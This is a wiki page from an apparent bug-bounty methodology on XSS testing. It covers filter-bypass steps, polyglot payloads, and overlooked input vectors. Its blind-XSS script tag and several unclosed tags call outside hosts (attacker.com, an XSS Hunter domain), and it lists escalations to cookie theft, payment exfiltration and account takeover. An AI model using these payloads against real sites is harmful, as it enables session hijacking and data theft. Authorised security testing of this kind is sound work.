====== XSS Testing ======

Cross-site scripting is high-frequency, chains well with CSRF and IDOR, and is worth testing on every input.

===== Testing Process =====

  - Test basic HTML injection -- can you input ''<h2>'', ''<img>'', ''<table>'' without filtering?
  - Check encoding -- reflected as ''&lt;script&gt;'' or ''%3Cscript%3E''? Test double encoding: ''%253C'', ''%26lt;''
  - Reverse engineer the filter -- blocking complete tags only? Try unclosed tag: ''<script src=//attacker.com?c=''
  - Test blacklist gaps: ''<svg>'', ''<%00iframe>'', ''on%0derror'', ''</script/x>'', ''<ScRiPt>''
  - Test **every reflected parameter** for both reflected and **blind XSS**
  - Check WAF behavior -- sometimes they only filter parameter **values** not **names**

===== Filter Bypass Flow =====

  - How are non-malicious HTML tags handled? ''<h2>'', ''<b>''
  - What about incomplete tags? ''<iframe src=//attacker.com/c=''
  - How do they handle encodings? ''<%00h2>'', ''%0d'', ''%0a'', ''%09''
  - Is it a blacklist of hardcoded strings? Does ''</script/x>'' work? ''<ScRiPt>''?
  - Does the blacklist apply to file uploads too?

===== Common Bypass Payloads =====

<code html>
<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<ScRiPt>alert(1)</ScRiPt>
<%00script>alert(1)</script>
</script/x><script>alert(1)</script>
<iframe src=//attacker.com/c=
</code>

===== Polyglot Payloads =====

<code>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A
" onclick=alert(1)//<button ' onclick=alert(1)//>
</code>

===== Input Vectors Often Missed =====

  * CSS customization fields (themes, profile colors)
  * Event/meeting name fields
  * Third-party integrations (Facebook import, OAuth name fields)
  * JSON POST body values
  * File upload filenames: ''photo.jpg<svg onload=confirm()>''
  * SWF parameters: ''onload'', ''allowedDomain'', ''movieplayer'', ''xmlPath'', ''callback''
  * Fake/injected parameters: ''?realparam=1&foo=bar'+alert(/XSS/)+'
  * Custom error pages
  * Mobile app signup -- different codebase, different filtering

===== Blind XSS =====

Use a blind XSS payload that calls back to your server (XSS Hunter, interactsh):

<code html>
"><script src=https://yourxsshunter.xss.ht></script>
</code>

Test in:
  * Support ticket fields
  * Admin-visible fields (name, bio, feedback)
  * Log-visible fields (User-Agent, Referer, X-Forwarded-For)

===== Escalating XSS =====

  * Chain with CSRF to perform state-changing actions from victim's browser
  * Steal session cookies if HttpOnly is not set
  * Use XSS to exfiltrate payment info from the DOM
  * Use XSS + no second confirmation for email/password change = account takeover
  * Self-XSS + CSRF = stored XSS affecting other users

===== See Also =====

  * [[tbhm:05_xss|TBHM XSS]]
  * [[zseano:csrf|CSRF Testing]]
  * [[zseano:escalation|Bug Chaining & Escalation]]
  * [[zseano:start|Methodology Index]]